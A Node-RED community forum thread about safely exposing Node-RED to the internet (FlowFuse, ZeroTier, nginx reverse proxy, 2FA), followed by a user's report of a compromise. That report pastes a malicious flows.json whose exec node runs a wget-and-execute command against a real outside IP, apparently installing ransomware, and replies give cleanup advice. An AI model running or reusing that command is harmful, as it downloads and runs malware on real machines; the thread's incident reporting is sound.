All flows gone after fresh install

You can install FlowFuse and by default your node-red instances are password protected as well as a boat load of other management features.

You can use docker, k8s or your file system (I use file system install to avoid unnecessary complications)

Better still, is to have it all done for you by using FlowFuse cloud - a small cost for security?

For your remote access needs you might want to take a look at Tailscale. It sets up a private mesh network over the Internet. Much easier than setting up reverse SSH IMHO.

While I appreciate that FlowFuse Cloud can be a great tool. In this case, it is not in any way helping. Why would anyone want FF Cloud when they are trying to build a home automation system? You surely want everything in-house (literally!).

Julian, I think you may be unaware of what FF cloud can offer users. FF has the tools to provide secure, seamless inter-instance communication meaning the user can manage node-red instances both in the cloud and remotely etc. for example the devices feature deploys node-red, securely to INSIDE your network and provides tunneled access via secured cloud SSO account. In short, with FF you can have node-red running in your Lan but managed securly. If required, for internet facing parts, you can have another instance running in the cloud, always on, always accessible - fully insulated from your home but with seamless & secure inter-instance communication (via secured MQTT under the hood) to your internal devices.

Not sure why you would make statements like this - I didn't suggest FF without reason - the OP literally opened up node-red to the internet & I am suggesting there are better ways!

So my slight misunderstanding of what the Cloud part of FF offers, my apology.

Partly my professional background which makes me twitch when commercial organisations start to "offer" things. When you've been in your umpteenth meeting with Service Now, Okta or Apple trying to hard-sell you stuff you know you really don't need and certainly don't want to pay through the nose for, it makes you rather jaded. (Once had some senior IBM folk trying to push a million £ solution for something that just needed a simple script! They didn't win that one thankfully)

But partly also my nervousness that Node-RED has always been open and free so it can feel uncomfortable to see commercial offerings - that's my issue though, not FF's.

However, I stand by my view that one of the key reasons for choosing Node-RED for home automation is to be cloud-free. That, of course, is a decision each person needs to make for themselves. Being cloud-free is different from being able to access your home from the Internet. But non-the-less, I get your point.

most of you had not read that the setting up has been a struggle for me and going down that rabbit hole of ideas causes more problems.

with that said

1. i do not want to use docker.
2. i want to use a raspberry pi and have nginx server and gui loaded on it and then use cloudflare .

my issue is only finding the tutorials that spends 85 percent explaining the process of reverse proxy and not enough detail on installing causing me problems.

as of now i have nginx , and nodejs , and nginx gui installed on the standalone pi. but i cant access the gui for the next step.

I honestly do appreciate the multiple incites , however if I keep bouncing between different software is going to be causing more issues.

so if someone has a good link that explains in detail how to install nginx,nodejs, and nginx Gui in detail only using a standard pi that is headless with no docker, container, ....
please point me in the correct direction.
cheers.

Hey @9toejack

I know it is overwhelming to try to securely publish a web service to the internet. And being hacked adds a completely different set of stress level to it. And I fully understand your requirement for remote access.

However ...

my simple advise to anybody is: if you don't know, what you are doing, then ... do not publish any service to the internet.

This doesn't help you at all now, I know, but the price you'd pay for any consequences might be way bigger than some deleted flows. And there are no links that provide you with a step-by-step guide out there, that you can trust. I f.e. cannot judge whether they are trustworthy, up-2-date or of necessary quality.

I'd better spend some time to find a solution that is manageable for rookies like us. This seems way safer

Cloudflare has been mentioned. FlowForge as well.

I love Zerotier for its simplicity. see here

I like ZeroTier also. Works on all platforms, easy to setup and manage. Easy to turn on/off as required.

+1 for Zerotier. But remember your account is only protected by your Zerotier account name and password, so make it a long long password.

I will freely admit that I've never tried a GUI for NGINX administration.

I've found a few:

• Instance Manager | NGINX Documentation - I think this can only be run with the commercial version of NGINX.
• Nginx UI | Yet another Nginx Web UI - a 3rd-party alternative.
• alibaba/nginx-admin-plus: Nginx admin plus is an open source multi-platform manager for nginx software, original from nginx-admin (github.com)
• schenkd/nginx-ui: Nginx UI allows you to access and modify the nginx configurations files without cli. (github.com)
• jslsolucoes/nginx-admin: Nginx admin is an open source multiplatform manager for nginx software to easy administration (github.com)

But I just split up my config into smaller files and link them together to get what I want. But I only really have a single site or 2.

Two Factor Authentication is available for zerotier and should be used

Well said. And 2FA/MFA should be used for EVERYTHING that you have a login for over the Internet.

i really only want access to my editor for myself but have it secured.
and then i want access to the node-red dashboard for me and multiple users when needed.
thats why i am trying to set up nginx as a reverse proxy. and im using cloudflare.
everything from cloudflare to the proxy is incrypted.
but again i cant bounce around to different options that all ultimately have the same final task at hand.
just need pointed to solid documentation on how to install reverse proxy from a fresh install.

Fully understand. That's exactly the use case I had, when I started with zerotier. I later connected my whole family to my smarthome.

Just pause and have a look at this 3 min. video here. It is really that simple

I am having a similar problem.

Here are the symptoms.

When I went into the editor today, the contents of my flows.json was just this.

[
    {
        "id": "ad2ea94e.3d6f38",
        "type": "tab",
        "label": "Thermostat",
        "disabled": false,
        "info": ""
    },
    {
        "id": "790b21cc-41af-4b3e-8e33-cba649e578cb",
        "type": "exec",
        "z": "ad2ea94e.3d6f38",
        "command": "cd /tmp; rm -rf bins.sh; wget http://91.92.249.32/bins/bins.sh; chmod +x bins.sh; sh bins.sh",
        "addpay": "",
        "append": "",
        "useSpawn": "false",
        "timer": "1000",
        "winHide": true,
        "oldrc": false,
        "name": "",
        "x": 9999,
        "y": 9999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "c822430b-356b-4ca5-8daa-ea689d72422a",
        "type": "inject",
        "z": "ad2ea94e.3d6f38",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 9999,
        "y": 9999,
        "wires": [
            [
                "790b21cc-41af-4b3e-8e33-cba649e578cb"
            ]
        ]
    }

I replaced the flows json with my most recent backup and applied some changes. After a few minutes, my flows json was replaced again. There is some process that has been installed on my server that is replacing my flows file with the one above. I am not sure how to go about finding the malware.

The file downloaded and executed by the snippet above seems to be trying to install ransomware. There is no reason to assume this will be the only attack method used.

Disconnect from the internet.
If you have network attached storage, disconnect it.
Close any ports you opened in your router. Do not ever re-open them.
If Node-red runs on a small or dedicated computer, reinstall everything from operating system upwards.
Run virus scans on all computers which have AV installed.

My problem was when i did a fresh install, i changed the install rename "localhost" to something more specific for me, and that was what causing the issue of my flows going away

piimager732×325 29.4 KB

reading your post again and the other replies, i did not have that, i had nothing.

jbudd,

Thanks for the quick response. i found yakuza in /tmp. doing some cleaning now. notes on yakuza indicate that the ransomeware will add 'yakuaz' to any encrypted file.

after purging all yakuza.* from /tmp, and running sudo updatedb, sudo locate yakuza returns nothing.

Maybe I nipped it in the bud.

sigh.... better late than never, added ufw limit in on publicinterface to any port ssh

removed my hostname entry from dyndns.

This topic was automatically closed 60 days after the last reply. New replies are no longer allowed.